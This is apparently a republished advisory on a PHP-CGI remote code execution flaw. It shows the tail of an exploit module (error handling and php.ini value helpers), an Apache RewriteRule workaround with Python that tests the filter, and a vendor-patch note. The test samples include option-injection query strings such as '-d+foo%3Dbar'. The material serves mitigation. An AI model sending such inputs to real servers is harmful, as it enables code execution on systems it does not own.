CGI Remote Arbitrary Code Execution Vulnerability (3)

    # Tail of the module's connection handling: a user interrupt is re-raised
    # so the framework can stop cleanly; connection and TLS failures are
    # reported rather than crashing the module.
    rescue ::Interrupt
      raise $!
    rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused
      print_error("The target service unreachable")
    rescue ::OpenSSL::SSL::SSLError
      print_error("The target failed to negotiate SSL, is this really an SSL service?")
    end
  end

  # Pick one of the spellings php.ini accepts for a boolean "false" at random.
  def rand_php_ini_false
    [ "0", "off", "false" ].sort_by{rand}.first
  end

  # Pick one of the spellings php.ini accepts for a boolean "true" at random.
  def rand_php_ini_true
    [ "1", "on", "true" ].sort_by{rand}.first
  end

end

Recommendation:
--------------------------------------------------------------------------------
Temporary workaround:

Use a RewriteRule to filter requests:

The RewriteRule rules are as follows (a query string that contains no "=" and contains a hyphen, literal or percent-encoded, is refused with 403):

RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? - [F,L]
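As an added example (not part of the original advisory), the following Python reproduces the two RewriteCond tests over constructed raw query strings, so the effect of the filter can be checked before it is deployed, including the legitimate hyphenated queries it also rejects. It assumes what Apache does: %{QUERY_STRING} is matched undecoded, so a percent-encoded "=" does not count as "=".

```python
import re

# Condition 1: no literal '=' anywhere. Per the CGI spec such a query string is
# passed to the CGI program on argv instead of as form data, which is what the
# vulnerability abuses.
COND_NO_EQUALS = re.compile(r"^[^=]*$")
# Condition 2: a hyphen, literal or percent-encoded; [NC] makes it
# case-insensitive, so "%2D" is caught as well as "%2d".
COND_HYPHEN = re.compile(r"%2d|-", re.IGNORECASE)


def blocked_by_rewrite_rule(raw_query: str) -> bool:
    """Return True when the advisory's RewriteRule would answer 403 (F flag)."""
    return bool(COND_NO_EQUALS.match(raw_query)) and bool(COND_HYPHEN.search(raw_query))


# Constructed sample query strings (as Apache sees them, undecoded) and the
# verdict the filter is expected to give.
SAMPLES = {
    "": False,                 # empty query: condition 2 fails
    "id=5": False,             # ordinary form data, has '='
    "id=5-3": False,           # hyphen is harmless once a literal '=' is present
    "-x": True,                # option-style argument, no '='
    "%2Dx": True,              # same, hyphen percent-encoded in upper case
    "a+%2db": True,            # hyphen after a '+' (space) is still caught
    "-d+foo%3Dbar": True,      # '=' encoded as %3D, so condition 1 still holds
    "page-1": True,            # legitimate but blocked: collateral damage to watch
    "search": False,           # no '=' and no hyphen: passes the filter
}


def run_samples(samples=SAMPLES):
    """Return (verdicts, mismatches): mismatches lists queries whose verdict
    differs from the expectation recorded in samples."""
    verdicts = {q: blocked_by_rewrite_rule(q) for q in samples}
    mismatches = [q for q, v in verdicts.items() if v != samples[q]]
    return verdicts, mismatches


if __name__ == "__main__":
    verdicts, mismatches = run_samples()
    for q, blocked in verdicts.items():
        print(f"{'BLOCK' if blocked else 'pass '}  ?{q}")
    print("mismatches:", mismatches)
```

Because the rule keys only on the absence of "=" plus a hyphen, any application that uses bare hyphenated query strings (like "?page-1" above) needs an exception or a different mitigation.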

Vendor patch:

PHP
---
The vendor has released two new versions, 5.3.12 and 5.4.2, but there are reports that they do not correctly fix this security issue; keep a close watch on the vendor's website and download the latest version:


Source (cite when republishing): https://www.heiqu.com/wwzxpg.html